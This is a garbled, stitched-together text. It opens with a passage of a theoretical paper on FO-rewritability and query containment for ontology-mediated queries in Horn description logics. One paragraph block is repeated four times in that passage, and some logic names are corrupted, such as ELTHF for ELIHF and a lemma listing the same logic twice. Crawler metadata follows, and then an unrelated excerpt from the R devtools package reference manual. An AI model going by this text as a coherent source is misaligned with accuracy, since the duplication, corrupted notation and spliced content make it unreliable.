2. there is a $k \geq 0$ such that for all pseudo tree $\Sigma$-ABoxes $A$ that are consistent with $T$ and of outdegree at most $|T|$ and width at most $|q|$: if $A \models Q(a)$ with $a$ from the core of $A$, then $A|_{\leq k} \models Q(a)$.
If $q$ is Boolean, this equivalence holds with (2.) replaced by
2'. there is a $k \geq 0$ such that for all pseudo tree $\Sigma$-ABoxes $A$ that are consistent with $T$ and of outdegree at most $|T|$ and of width at most $|q|$: if $A \models Q$, then $A|_{>0} \models Q$ or $A|_{\leq k} \models Q$.
If $Q$ is from (ELHF, conCQ), then the above equivalences hold also when pseudo tree $\Sigma$-ABoxes are replaced with pseudo ditree $\Sigma$-ABoxes.
Theorem 11. Let $T$ be an $\mathcal{ELIHF}_{\bot}$ TBox. Then Theorem 9 still holds with the following modifications:
1. if $q$ is not Boolean or $T$ is an $\mathcal{ELIHF}_{\bot}$ TBox, “there is a $k \geq 0$” is replaced with “for $k = |q| + 2^{4(|T|+|q|)^2}$”;
2. if $q$ is Boolean, “there is a $k \geq 0$” is replaced with “for $k = |q| + 2^{4(|T|+2|q|)^2}$”.
The proof of Theorem 11 uses a pumping argument based on derivations of concept names in the pumped ABox by $T$. Due to the presence of inverse roles, this is not entirely trivial and uses what we call transfer sequences, describing the derivation history at a point of an ABox. Together with the proof of Theorem 9, Theorem 11 gives rise to an algorithm that constructs actual rewritings when they exist.
5 Constructing Automata
We show that Proposition 8 and Theorem 11 give rise to automata-based decision procedures for containment and FO-rewritability that establish the upper bounds stated in Theorems 5 and 6. By Theorem 4, it suffices to consider connected queries in the case of FO-rewritability. We now observe that we can further restrict our attention to Boolean queries. We use BCQ (resp. conBCQ) to denote the class of all Boolean CQs (resp. connected Boolean CQs).
Lemma 12. Let $L \in \{\mathcal{ELIHF}_{\bot}, \mathcal{ELIHF}_{\bot}\}$. Then
1. FO-rewritability in $(L, \text{conCQ})$ can be reduced in polytime to FO-rewritability in $(L, \text{conBCQ})$;
2. Containment in $(L, \text{CQ})$ can be reduced in polytime to containment in $(L, \text{BCQ})$.
The decision procedures rely on building automata that accept pseudo tree ABoxes which witness non-containment and non-FO-rewritability as stipulated by Proposition 8 and Theorem 11, respectively. We first have to encode pseudo tree ABoxes in a suitable way.
A tree is a non-empty (and potentially infinite) set $T \subseteq \mathbb{N}^*$ closed under prefixes. We say that $T$ is $m$-ary if for every $x \in T$, the set $\{i \mid x \cdot i \in T\}$ is of cardinality at most $m$. For an alphabet $\Gamma$, a $\Gamma$-labeled tree is a pair $(T, L)$ with a tree $T$ and a labeling function. Let $Q = (T, \Sigma, q)$ be an OMQ from $(\mathcal{ELIHF}_{\bot}, \text{conBCQ})$. We encode pseudo tree ABoxes of width at most $|q|$ and outdegree at most $|T|$ by $(|T| \cdot |q|)$-ary $\Sigma_e \subseteq \Sigma_N$-labeled trees, where $\Sigma_e$ is an alphabet used for labeling root nodes and $\Sigma_N$ is for non-root nodes.
The alphabet $\Sigma_e$ consists of all $\Sigma$-ABoxes $A$ such that $\text{Ind}(A)$ only contains individual names from a fixed set $\text{Ind}_{\text{core}}$ of size $|q|$ and $A$ satisfies all functionality statements in $T$. The alphabet $\Sigma_N$ consists of all subsets $\Theta \subseteq (\mathbb{N}_e \cap \Sigma) \cup \{r, r^- \mid r \in \text{Ind}_{\text{core}} \cap \Sigma\}$.
The decision procedures rely on building automata that accept pseudo tree ABoxes which witness non-containment and non-FO-rewritability as stipulated by Proposition 8 and Theorem 11, respectively. We first have to encode pseudo tree ABoxes in a suitable way.
A tree is a non-empty (and potentially infinite) set $T \subseteq \mathbb{N}^*$ closed under prefixes. We say that $T$ is $m$-ary if for every $x \in T$, the set $\{i \mid x \cdot i \in T\}$ is of cardinality at most $m$. For an alphabet $\Gamma$, a $\Gamma$-labeled tree is a pair $(T, L)$ with a tree $T$ and a labeling function. Let $Q = (T, \Sigma, q)$ be an OMQ from $(\mathcal{ELIHF}_{\bot}, \text{conBCQ})$. We encode pseudo tree ABoxes of width at most $|q|$ and outdegree at most $|T|$ by $(|T| \cdot |q|)$-ary $\Sigma_e \subseteq \Sigma_N$-labeled trees, where $\Sigma_e$ is an alphabet used for labeling root nodes and $\Sigma_N$ is for non-root nodes.
The alphabet $\Sigma_e$ consists of all $\Sigma$-ABoxes $A$ such that $\text{Ind}(A)$ only contains individual names from a fixed set $\text{Ind}_{\text{core}}$ of size $|q|$ and $A$ satisfies all functionality statements in $T$. The alphabet $\Sigma_N$ consists of all subsets $\Theta \subseteq (\mathbb{N}_e \cap \Sigma) \cup \{r, r^- \mid r \in \text{Ind}_{\text{core}} \cap \Sigma\}$.
The decision procedures rely on building automata that accept pseudo tree ABoxes which witness non-containment and non-FO-rewritability as stipulated by Proposition 8 and Theorem 11, respectively. We first have to encode pseudo tree ABoxes in a suitable way.
A tree is a non-empty (and potentially infinite) set $T \subseteq \mathbb{N}^*$ closed under prefixes. We say that $T$ is $m$-ary if for every $x \in T$, the set $\{i \mid x \cdot i \in T\}$ is of cardinality at most $m$. For an alphabet $\Gamma$, a $\Gamma$-labeled tree is a pair $(T, L)$ with a tree $T$ and a labeling function. Let $Q = (T, \Sigma, q)$ be an OMQ from $(\mathcal{ELIHF}_{\bot}, \text{conBCQ})$. We encode pseudo tree ABoxes of width at most $|q|$ and outdegree at most $|T|$ by $(|T| \cdot |q|)$-ary $\Sigma_e \subseteq \Sigma_N$-labeled trees, where $\Sigma_e$ is an alphabet used for labeling root nodes and $\Sigma_N$ is for non-root nodes.
The alphabet $\Sigma_e$ consists of all $\Sigma$-ABoxes $A$ such that $\text{Ind}(A)$ only contains individual names from a fixed set $\text{Ind}_{\text{core}}$ of size $|q|$ and $A$ satisfies all functionality statements in $T$. The alphabet $\Sigma_N$ consists of all subsets $\Theta \subseteq (\mathbb{N}_e \cap \Sigma) \cup \{r, r^- \mid r \in \text{Ind}_{\text{core}} \cap \Sigma\}$.
The decision procedures rely on building automata that accept pseudo tree ABoxes which witness non-containment and non-FO-rewritability as stipulated by Proposition 8 and Theorem 11, respectively. We first have to encode pseudo tree ABoxes in a suitable way.
A tree is a non-empty (and potentially infinite) set $T \subseteq \mathbb{N}^*$ closed under prefixes. We say that $T$ is $m$-ary if for every $x \in T$, the set $\{i \mid x \cdot i \in T\}$ is of cardinality at most $m$. For an alphabet $\Gamma$, a $\Gamma$-labeled tree is a pair $(T, L)$ with a tree $T$ and a labeling function. Let $Q = (T, \Sigma, q)$ be an OMQ from $(\mathcal{ELIHF}_{\bot}, \text{conBCQ})$. We encode pseudo tree ABoxes of width at most $|q|$ and outdegree at most $|T|$ by $(|T| \cdot |q|)$-ary $\Sigma_e \subseteq \Sigma_N$-labeled trees, where $\Sigma_e$ is an alphabet used for labeling root nodes and $\Sigma_N$ is for non-root nodes.
The alphabet $\Sigma_e$ consists of all $\Sigma$-ABoxes $A$ such that $\text{Ind}(A)$ only contains individual names from a fixed set $\text{Ind}_{\text{core}}$ of size $|q|$ and $A$ satisfies all functionality statements in $T$. The alphabet $\Sigma_N$ consists of all subsets $\Theta \subseteq (\mathbb{N}_e \cap \Sigma) \cup \{r, r^- \mid r \in \text{Ind}_{\text{core}} \cap \Sigma\}$.
To decide $Q_1 \subseteq Q_2$ for OMQs $Q_i = (T_i, \Sigma_i, q_i), i \in \{1, 2\}$, from $(\mathcal{ELTHF}_\perp, \text{BCQ})$, by Proposition 8 it suffices to decide whether $L(\mathcal{A}_Q) \cap L(\mathcal{A}_{Q_2}) \subseteq L(\mathcal{A}_{Q_1})$. Since this question can be polynomially reduced to a TWAPA emptiness check and the latter can be executed in time single exponential in the number of states, this yields the upper bounds for containment stated in Theorems 5 and 6.
To decide non-FO-rewritability of an OMQ $Q = (T, \Sigma, q)$ from $(\mathcal{ELTHF}_\perp, \text{conBCQ})$, by Theorem 11 we need to decide whether there is a pseudo tree $\Sigma$-ABox $\mathcal{A}$ of outdegree at most $|T|$ and width at most $|q|$ that is consistent with $T$ and satisfies (i) $A \models Q$, (ii) $A|_{>0} \not\models Q$, and (iii) $A|_{\leq k} \not\models Q$ where $k = |q| + 2^{\ell(|T|+2^{|q|})^2}$. For consistency with $T$ and for (i), we use the automaton $\mathcal{A}_Q$ from Proposition 13. To achieve (ii) and (iii), we amend the tree alphabet $\Sigma \cup \Sigma_a$ with additional labels that implement a counter which counts up to $k$ and annotate each node in the tree with its depth (up to $k$). We then complement $\mathcal{A}_Q$ (which for TWAPAs can be done in polynomial time), relativize the resulting automaton to all but the first level of the input ABox for (ii) and to the first $k$ levels for (iii), and finally intersect all automata and check emptiness. This yields the upper bounds for FO-rewritability stated in Theorems 5 and 6.
As remarked in the introduction, apart from FO-rewritability of an OMQ $(T, \Sigma, q)$ we should also be interested in FO-rewritability of ABox inconsistency relative to $T$ and $\Sigma$. We close this section with noting that an upper bound for this problem can be obtained from Point 2 of Proposition 13 since TWAPAs can be complemented in polynomial time. A matching lower bound can be found in [Bienvenu et al., 2013].
**Theorem 14.** In $\mathcal{ELTHF}_\perp$, FO-rewritability of ABox inconsistency is ExpTime-complete.
## 6 Rooted Queries and Lower Bounds
We first consider the case of rooted queries and establish the upper bound in Theorem 7.
**Theorem 15.** FO-rewritability and containment in $(\mathcal{ELTHF}_\perp, rCQ)$ are in coNExpTime.
Because of space limitations, we confine ourselves to a brief sketch, concentrating on FO-rewritability. By Point 1 of Theorem 11, deciding non-FO-rewritability of an OMQ $Q = (T, \Sigma, q)$ from $(\mathcal{ELTHF}_\perp, rCQ)$ comes down to checking the existence of a pseudo tree $\Sigma$-ABox $\mathcal{A}$ that is consistent with $T$ and such that $A \models Q(a)$ and $A|_{\leq k} \not\models Q(a)$ for some tuple of individuals $a$ from the core of $\mathcal{A}$, for some suitable $k$. Recall that $A \models Q(a)$ if and only if there is a homomorphism $h$ from $q$ to the pseudo tree-shaped canonical model of $T$ and $\mathcal{A}$ that takes the answer variables to $a$. Because $a$ is from the core of $\mathcal{A}$ and $q$ is rooted, $h$ can map existential variables in $q$ only to individuals from $A|_{\leq |q|}$ and to the anonymous elements in the subtrees below them. To decide the existence of $A$, we can thus guess $A|_{\leq |q|}$ together with sets of concept assertions about individuals in $A|_{\leq |q|}$ that can be inferred from $A$ and $T$, and from $A|_{\leq k}$ and $T$. We can then check whether there is a homomorphism $h$ as described, without access to the full ABoxes $\mathcal{A}$ and $A|_{\leq k}$. It remains to ensure that the guessed initial part $A|_{\leq |q|}$ can be extended to $\mathcal{A}$ such that the entailed concept assertions are precisely those that were guessed, by attaching tree-shaped ABoxes to individuals on level $|q|$. This can be done by a mix of guessing and automata techniques.
We next establish the lower bounds stated in Theorems 5 and 7. For Theorem 5, we only prove a lower bound for Point 1 as the one in Point 2 follows from [Bienvenu et al., 2013].
**Theorem 16.** Containment and FO-rewritability are
1. coNExpTime-hard in $(\mathcal{EL}, rCQ)$ and
2. 2ExpTime-hard in $(\mathcal{ELT}, rCQ)$.
The results for containment apply already when both OMQs share the same TBox.
Point 1 is proved by reduction of the problem of tiling a torus of exponential size, and Point 2 is proved by reduction of the word problem of exponentially space-bounded alternating Turing machines (ATMs). The proofs use queries similar to those introduced in [Lutz, 2008] to establish lower bounds on the complexity of query answering in the expressive OMQ languages $(\mathcal{ALCHI}, rCQ)$ and $(\mathcal{ALCHI}, CQ)$. A major difference to the proofs in [Lutz, 2008] is that we represent torus tilings / ATM computations in the ABox that witnesses non-containment or non-FO-rewritability, instead of in the ‘anonymous part’ of the model created by existential quantifiers. The proof of Point 2 of Theorem 16 can be modified to yield new lower bounds for monadic Datalog containment. Recall that the rule body of a Datalog program is a CQ. Tree-shapedness of a CQ $q$ is defined in the same way as for an ABox in Section 4, that is, $q$ viewed as an undirected graph must be a tree without multi-edges.
**Theorem 17.** For monadic Datalog programs which contain no EDB relations of arity larger than two and no constants, containment
1. in a rooted CQ is coNExpTime-hard;
2. in a CQ is 2ExpTime-hard, even when all rule bodies are tree-shaped.
Point 1 closes an open problem from [Chaudhuri and Vardi, 1994], where a coNExpTime upper bound for containment of a monadic Datalog program in a rooted UCQ was proved and the lower bound was left open. Point 2 further improves a lower bound from [Benedikt et al., 2012] which also does not rely on EDB relations of arity larger than two, but requires that rule bodies are not tree-shaped or constants are present (which, in this case, correspond to nominals in the DL world).
## 7 Conclusion
A natural next step for future work is to use the techniques developed here for devising practically efficient algorithms that construct actual rewritings, which was very successful in the AQ case [Hansen et al., 2015].
An interesting open theoretical question is the complexity of FO-rewritability and containment for the OMQ languages considered in this paper in the special case when the ABox signature contains all concept and role names.
**Acknowledgements.** Bienvenu was supported by ANR project PAGODA (12-JS02-007-01), Hansen and Lutz by ERC grant 647289, Wolter by EPSRC UK grant EP/M012646/1.
References
|
{"Source-Url": "https://hal-lirmm.ccsd.cnrs.fr/lirmm-01367863/file/BieHanLutWol-IJCAI16.pdf", "len_cl100k_base": 10933, "olmocr-version": "0.1.50", "pdf-total-pages": 8, "total-fallback-pages": 0, "total-input-tokens": 34756, "total-output-tokens": 13680, "length": "2e13", "weborganizer": {"__label__adult": 0.0005164146423339844, "__label__art_design": 0.0005970001220703125, "__label__crime_law": 0.000736236572265625, "__label__education_jobs": 0.00246429443359375, "__label__entertainment": 0.00027108192443847656, "__label__fashion_beauty": 0.00029850006103515625, "__label__finance_business": 0.0005321502685546875, "__label__food_dining": 0.0007119178771972656, "__label__games": 0.0016994476318359375, "__label__hardware": 0.0009717941284179688, "__label__health": 0.0012378692626953125, "__label__history": 0.0006566047668457031, "__label__home_hobbies": 0.0001819133758544922, "__label__industrial": 0.0008625984191894531, "__label__literature": 0.0016794204711914062, "__label__politics": 0.0005922317504882812, "__label__religion": 0.00089263916015625, "__label__science_tech": 0.42529296875, "__label__social_life": 0.00020897388458251953, "__label__software": 0.014129638671875, "__label__software_dev": 0.5439453125, "__label__sports_fitness": 0.0003790855407714844, "__label__transportation": 0.0009474754333496094, "__label__travel": 0.0002796649932861328}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 43139, 0.03269]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 43139, 0.3822]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 43139, 0.83321]], "google_gemma-3-12b-it_contains_pii": [[0, 1175, false], [1175, 6609, null], [6609, 10745, null], [10745, 18285, null], [18285, 24566, null], [24566, 31369, null], [31369, 37995, null], [37995, 43139, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1175, true], [1175, 6609, null], [6609, 10745, null], [10745, 18285, null], [18285, 24566, null], [24566, 31369, null], [31369, 37995, null], [37995, 43139, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 43139, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 43139, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 43139, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 43139, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 43139, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 43139, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 43139, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 43139, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 43139, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 43139, null]], "pdf_page_numbers": [[0, 1175, 1], [1175, 6609, 2], [6609, 10745, 3], [10745, 18285, 4], [18285, 24566, 5], [24566, 31369, 6], [31369, 37995, 7], [37995, 43139, 8]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 43139, 0.0]]}
|
olmocr_science_pdfs
|
2024-11-28
|
2024-11-28
|
66450e67ec2a4a6be381d3ed2c228b1d0dfdfcad
|
R topics documented:
- bash ......................................................... 2
- build ....................................................... 3
- build_manual ........................................... 4
- build_readme ............................................ 4
- build_site ............................................... 5
- build_vignettes ........................................ 5
- check ....................................................... 6
- check_failures .......................................... 9
- check_man ............................................... 9
- check_rhub ............................................. 10
- check_win ............................................... 11
- clean_vignettes ....................................... 12
- create .................................................... 13
- devtools ............................................... 13
- dev_mode ............................................... 15
- dev_sitrep ............................................. 15
- document ............................................... 16
- install ................................................... 17
- install_deps ............................................ 18
- lint ....................................................... 20
- load_all ............................................... 21
- missing_s3 ............................................ 23
- package_file .......................................... 23
- release ................................................. 24
- reload .................................................... 25
- revdep .................................................... 25
- run_examples .......................................... 27
- save_all ............................................... 28
- show_news .............................................. 28
- source_gist ........................................... 29
- source_url ............................................. 30
- spell_check ............................................ 31
- test ....................................................... 31
- uninstall .............................................. 32
- wd .......................................................... 33
Index 34
bash Open bash shell in package directory.
Description
Open bash shell in package directory.
Usage
bash(pkg = ".")
Arguments
pkg
The package to use, can be a file path to the package or a package object. See
`as.package()` for more information.
Description
Building converts a package source directory into a single bundled file. If `binary = FALSE` this creates a tar.gz package that can be installed on any platform, provided they have a full development environment (although packages without source code can typically be installed out of the box). If `binary = TRUE`, the package will have a platform specific extension (e.g. .zip for windows), and will only be installable on the current platform, but no development environment is needed.
Usage
```r
build(
pkg = ".",
path = NULL,
binary = FALSE,
vignettes = TRUE,
manual = FALSE,
args = NULL,
quiet = FALSE,
...
)
```
Arguments
pkg
The package to use, can be a file path to the package or a package object. See
`as.package()` for more information.
path
Path in which to produce package. If `NULL`, defaults to the parent directory of
the package.
binary
Produce a binary (`--binary`) or source (`--no-manual --no-resave-data`) version of the package.
vignettes
For source packages: if `FALSE`, don’t build PDF vignettes (`--no-build-vignettes`) or manual (`--no-manual`).
manual
For source packages: if `FALSE`, don’t build PDF vignettes (`--no-build-vignettes`) or manual (`--no-manual`).
args
An optional character vector of additional command line arguments to be passed
to R CMD build if `binary = FALSE`, or R CMD install if `binary = TRUE`.
quiet if TRUE suppresses output from this function.
...
Additional arguments passed to pkgbuild::build.
Value
a string giving the location (including file name) of the built package
build_manual Create package pdf manual
Description
Create package pdf manual
Usage
build_manual(pkg = ".", path = NULL)
Arguments
pkg The package to use, can be a file path to the package or a package object. See as.package() for more information.
path path in which to produce package manual. If NULL, defaults to the parent directory of the package.
See Also
Rd2pdf()
build_readme Build a Rmarkdown README for a package
Description
build_readme() is a wrapper around rmarkdown::render(), it generates the README.md from a README.Rmd file.
Usage
build_readme(path = ".", quiet = TRUE, ...)
Arguments
path path to the package to build the readme.
quiet If TRUE, suppress output.
... additional arguments passed to rmarkdown::render()
**build_site**
Execute **pkgdown** build site in a package
**Description**
`build_site()` is a shortcut for `pkgdown::build_site()`, it generates the static HTML documentation.
**Usage**
```r
build_site(path = ".", quiet = TRUE, ...)
```
**Arguments**
- **path**
- path to the package to build the static HTML.
- **quiet**
- If TRUE, suppress output.
- **...**
- additional arguments passed to `pkgdown::build_site()`
**build_vignettes**
Build package vignettes.
**Description**
Builds package vignettes using the same algorithm that R CMD build does. This means including non-Sweave vignettes, using makefiles (if present), and copying over extra files. The files are copied in the 'doc' directory and an vignette index is created in 'Meta/vignette.rds', as they would be in a built package. 'doc' and 'Meta' are added to .Rbuildignore, so will not be included in the built package. These files can be checked into version control, so they can be viewed with `browseVignettes()` and `vignette()` if the package has been loaded with `load_all()` without needing to re-build them locally.
**Usage**
```r
build_vignettes(
pkg = ".",
dependencies = "VignetteBuilder",
clean = TRUE,
upgrade = "never",
quiet = TRUE,
install = TRUE,
keep_md = TRUE
)
```
Arguments
pkg
The package to use, can be a file path to the package or a package object. See `as.package()` for more information.
dependencies
Which dependencies do you want to check? Can be a character vector (selecting from "Depends", "Imports", "LinkingTo", "Suggests", or "Enhances"), or a logical vector. TRUE is shorthand for "Depends", "Imports", "LinkingTo" and "Suggests". NA is shorthand for "Depends", "Imports" and "LinkingTo" and is the default. FALSE is shorthand for no dependencies (i.e. just check this package, not its dependencies).
clean
Remove all files generated by the build, even if there were copies there before.
upgrade
One of "default", "ask", "always", or "never". "default" respects the value of the R_REMOTES_UPGRADE environment variable if set, and falls back to "ask" if unset. "ask" prompts the user for which out of date packages to upgrade. For non-interactive sessions "ask" is equivalent to "always". TRUE and FALSE are also accepted and correspond to "always" and "never" respectively.
quiet
If TRUE, suppresses most output. Set to FALSE if you need to debug.
install
If TRUE, install the package before building vignettes.
keep_md
If TRUE, move md intermediates as well as rendered outputs. Most useful when using the keep_md YAML option for Rmarkdown outputs. See https://bookdown.org/yihui/rmarkdown/html-document.html#keeping-markdown.
See Also
check_vignettes() to remove the pdfs in ‘doc’ created from vignettes
check_vignettes() to remove build tex/pdf files.
check Build and check a package, cleaning up automatically on success.
Description
check automatically builds and checks a source package, using all known best practices. check_built checks an already built package.
Usage
check(
pkg = ".",
document = NA,
build_args = NULL,
...,
manual = FALSE,
cran = TRUE,
remote = FALSE,
incoming = remote,
force_suggests = FALSE,
run_dont_test = FALSE,
args = "--timings",
env_vars = c(NOT_CRAN = "true"),
quiet = FALSE,
check_dir = tempdir(),
cleanup = TRUE,
vignettes = TRUE,
error_on = c("never", "error", "warning", "note")
)
check_built(
path = NULL,
cran = TRUE,
remote = FALSE,
incoming = remote,
force_suggests = FALSE,
run_dont_test = FALSE,
manual = FALSE,
args = "--timings",
env_vars = NULL,
check_dir = tempdir(),
quiet = FALSE,
error_on = c("never", "error", "warning", "note")
)
Arguments
pkg
The package to use, can be a file path to the package or a package object. See
as.package() for more information.
document
If NA and the package uses roxygen2, will rerun document() prior to checking. Use TRUE and FALSE to override this default.
build_args
Additional arguments passed to R CMD build
... Additional arguments passed on to pkgbuild::build().
manual
If FALSE, don’t build and check manual (--no-manual).
cran
if TRUE (the default), check using the same settings as CRAN uses.
remote
Sets _R_CHECK_CRAN_INCOMING_REMOTE_ env var. If TRUE, performs a number of CRAN incoming checks that require remote access.
incoming
Sets _R_CHECK_CRAN_INCOMING_ env var. If TRUE, performs a number of CRAN incoming checks.
force_suggests
Sets _R_CHECK_FORCE_SUGGESTS_. If FALSE (the default), check will proceed even if all suggested packages aren’t found.
run_dont_test
Sets --run-donttest so that tests surrounded in \donttest{} are also tested. This is important for CRAN submission.
args Additional arguments passed to R CMD check
env_vars Environment variables set during R CMD check
quiet if TRUE suppresses output from this function.
check_dir the directory in which the package is checked compatibility. args = "--output=/foo/bar"
can be used to change the check directory.
cleanup Deprecated.
vignettes If FALSE, do not build or check vignettes, equivalent to using args = '--ignore-vignettes' and build_args = '--no-build-vignettes'.
error_on Whether to throw an error on R CMD check failures. Note that the check is always completed (unless a timeout happens), and the error is only thrown after completion. If "never", then no errors are thrown. If "error", then only ERROR failures generate errors. If "warning", then WARNING failures generate errors as well. If "note", then any check failure generated an error.
path Path to built package.
Details
Passing R CMD check is essential if you want to submit your package to CRAN: you must not have any ERRORs or WARNINGs, and you want to ensure that there are as few NOTEs as possible. If you are not submitting to CRAN, at least ensure that there are no ERRORs or WARNINGs: these typically represent serious problems.
check automatically builds a package before calling check_built as this is the recommended way to check packages. Note that this process runs in an independent realisation of R, so nothing in your current workspace will affect the process.
Value
An object containing errors, warnings, and notes.
Environment variables
Devtools does its best to set up an environment that combines best practices with how check works on CRAN. This includes:
- The standard environment variables set by devtools: r_env_vars(). Of particular note for package tests is the NOT_CRAN env var which lets you know that your tests are not running on CRAN, and hence can take a reasonable amount of time.
- Debugging flags for the compiler, set by compiler_flags(FALSE).
- If aspell is found _R_CHECK_CRAN_INCOMING_USE_ASPELL_ is set to TRUE. If no spell checker is installed, a warning is issued.)
- env vars set by arguments incoming, remote and force_suggests
See Also
release() if you want to send the checked package to CRAN.
check_failures
Parses R CMD check log file for ERRORs, WARNINGs and NOTEs
Description
Extracts check messages from the 00check.log file generated by R CMD check.
Usage
check_failures(path, error = TRUE, warning = TRUE, note = TRUE)
Arguments
path
check path, e.g., value of the check_dir argument in a call to check()
error, warning, note
logical, indicates if errors, warnings and/or notes should be returned
Value
a character vector with the relevant messages, can have length zero if no messages are found
See Also
check()
check_man
Check documentation, as R CMD check does.
Description
This function attempts to run the documentation related checks in the same way that R CMD check does. Unfortunately it can’t run them all because some tests require the package to be loaded, and the way they attempt to load the code conflicts with how devtools does it.
Usage
check_man(pkg = ".")
Arguments
pkg
The package to use, can be a file path to the package or a package object. See as.package() for more information.
Value
Nothing. This function is called purely for it’s side effects: if
Examples
```r
## Not run:
check_man("mypkg")
## End(Not run)
```
---
**check_rhub**
*Run CRAN checks for package on R-hub*
**Description**
It runs `build()` on the package, with the arguments specified in `args`, and then submits it to the R-hub builder at https://builder.r-hub.io. The interactive option controls whether the function waits for the check output. Regardless, after the check is complete, R-hub sends an email with the results to the package maintainer.
**Usage**
```r
check_rhub(
pkg = ".",
platforms = NULL,
email = NULL,
interactive = TRUE,
build_args = NULL,
...
)
```
**Arguments**
- `pkg` The package to use, can be a file path to the package or a package object. See `as.package()` for more information.
- `platforms` R-hub platforms to run the check on. If `NULL` uses default list of CRAN checkers (one for each major platform, and one with extra checks if you have compiled code). You can also specify your own, see `rhub::platforms()` for a complete list.
- `email` email address to notify, defaults to the maintainer address in the package.
- `interactive` whether to show the status of the build interactively. R-hub will send an email to the package maintainer’s email address, regardless of whether the check is interactive or not.
- `build_args` Arguments passed to R CMD build
- `...` extra arguments, passed to `rhub::check_for_cran()`.
**Value**
A `rhub_check` object.
About email validation on r-hub
To build and check R packages on R-hub, you need to validate your email address. This is because R-hub sends out emails about build results. See more at rhub::validate_email().
See Also
Other build functions: check_win()
check_win Build windows binary package.
Description
This function works by bundling source package, and then uploading to https://win-builder.r-project.org/. Once building is complete you’ll receive a link to the built package in the email address listed in the maintainer field. It usually takes around 30 minutes. As a side effect, win-build also runs R CMD check on the package, so check_win is also useful to check that your package is ok on windows.
Usage
check_win_devel(
pkg = "..",
args = NULL,
manual = TRUE,
email = NULL,
quiet = FALSE,
...
)
check_win_release(
pkg = "..",
args = NULL,
manual = TRUE,
email = NULL,
quiet = FALSE,
...
)
check_win_oldrelease(
pkg = "..",
args = NULL,
manual = TRUE,
email = NULL,
quiet = FALSE,
...
)
Arguments
pkg The package to use, can be a file path to the package or a package object. See \texttt{as.package()} for more information.
args An optional character vector of additional command line arguments to be passed to \texttt{R CMD build} if \texttt{binary = FALSE}, or \texttt{R CMD install} if \texttt{binary = TRUE}.
manual For source packages: if \texttt{FALSE}, don't build PDF vignettes (\texttt{--no-build-vignettes}) or manual (\texttt{--no-manual}).
e-mail An alternative email to use, default \texttt{NULL} uses the package Maintainer's email.
quiet If \texttt{TRUE}, suppresses output.
... Additional arguments passed to \texttt{pkgbuild::build()}.
Functions
- \texttt{check_win_devel}: Check package on the development version of R.
- \texttt{check_win_release}: Check package on the release version of R.
- \texttt{check_win_oldrelease}: Check package on the previous major release version of R.
See Also
Other build functions: \texttt{check_rhub()}
\begin{verbatim}
clean_vignettes Clean built vignettes.
\end{verbatim}
Description
This uses a fairly rudimentary algorithm where any files in 'doc' with a name that exists in 'vignettes' are removed.
Usage
clean_vignettes(pkg = ".")
Arguments
pkg The package to use, can be a file path to the package or a package object. See \texttt{as.package()} for more information.
create
Create a package
Description
Create a package
Usage
```r
create(
path,
fields = NULL,
rstudio = rstudioapi::isAvailable(),
open = interactive()
)
```
Arguments
- **path**
A path. If it exists, it is used. If it does not exist, it is created, provided that the parent path exists.
- **fields**
A named list of fields to add to DESCRIPTION, potentially overriding default values. See `use_description()` for how you can set personalized defaults using package options.
- **rstudio**
If TRUE, calls `use_rstudio()` to make the new package or into an RStudio Project.
- **open**
If TRUE, activates the new project:
- If RStudio desktop, the package is opened in a new session.
- If on RStudio server, the current RStudio project is activated.
- Otherwise, the working directory and active project is changed.
Value
The path to the created package, invisibly.
devtools
Package development tools for R.
Description
Collection of package development tools.
Package options
Devtools uses the following `options()` to configure behaviour:
- `devtools.path`: path to use for `dev_mode()`
- `devtools.name`: your name, used when signing draft emails.
- `devtools.install.args`: a string giving extra arguments passed to R CMD install by `install()`.
- `devtools.desc.author`: a string providing a default Authors@R string to be used in new `DESCRIPTION`'s. Should be a R code, and look like "Hadley Wickham <h.wickham@gmail.com> [aut,cre]". See `utils::as.person()` for more details.
- `devtools.desc.license`: a default license string to use for new packages.
- `devtools.desc.suggests`: a character vector listing packages to add to suggests by defaults for new packages.
- `devtools.desc`: a named list listing any other extra options to add to `DESCRIPTION`
Author(s)
**Maintainer**: Jim Hester <jim.hest@rstudio.com>
Authors:
- Hadley Wickham
- Winston Chang
Other contributors:
- RStudio [copyright holder]
- R Core team (Some namespace and vignette code extracted from base R) [contributor]
See Also
Useful links:
- [https://devtools.r-lib.org/](https://devtools.r-lib.org/)
- [https://github.com/r-lib/devtools](https://github.com/r-lib/devtools)
- Report bugs at [https://github.com/r-lib/devtools/issues](https://github.com/r-lib/devtools/issues)
**dev_mode**
*Activate and deactivate development mode.*
**Description**
When activated, dev_mode creates a new library for storing installed packages. This new library is automatically created when dev_mode is activated if it does not already exist. This allows you to test development packages in a sandbox, without interfering with the other packages you have installed.
**Usage**
```r
dev_mode(on = NULL, path = getOption("devtools.path"))
```
**Arguments**
- **on**
- turn dev mode on (TRUE) or off (FALSE). If omitted will guess based on whether or not path is in `.libPaths()`.
- **path**
- directory to library.
**Examples**
```r
## Not run:
dev_mode()
dev_mode()
dev_mode()
## End(Not run)
```
**dev_sitrep**
*Report package development situation*
**Description**
dev_sitrep() reports
- If R is up to date
- If RStudio is up to date
- If compiler build tools are installed and available for use
- If devtools and its dependencies are up to date
- If the package’s dependencies are up to date
